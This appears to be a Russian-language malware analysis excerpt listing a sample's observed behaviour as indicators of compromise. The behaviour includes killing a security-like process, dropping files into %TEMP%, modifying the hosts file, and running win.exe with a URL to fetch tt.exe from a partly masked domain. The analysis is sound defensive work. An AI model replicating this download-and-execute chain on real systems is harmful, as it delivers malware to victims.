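Техническая информация
Ниже перечислены зафиксированные команды, пути к файлам и сетевые обращения; заголовки разделов в записи отсутствуют, поэтому для путей к файлам не указано, создавался файл, изменялся или удалялся.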
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe" (завершение процесса по имени образа praetorian.exe)
- %TEMP%\install.cmd
- %TEMP%\drv.dll
- %TEMP%\win.exe
- <DRIVERS>\etc\hosts
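- DNS-запрос (DNS ASK): ik####.air-bagan.org (часть имени узла, по-видимому, скрыта символами #; для поиска по журналам DNS остаётся домен air-bagan.org)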
- ClassName: '' WindowName: ''
- '%TEMP%\win.exe' http://ik####.air-bagan.org/tt.exe (запуск win.exe с URL в качестве аргумента; вероятно, для загрузки tt.exe)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\install.cmd" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
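- '%WINDIR%\syswow64\find.exe' /i "win.exe" (поиск строки «win.exe» без учёта регистра; вероятно, в выводе tasklist.exe — проверка, запущен ли win.exe)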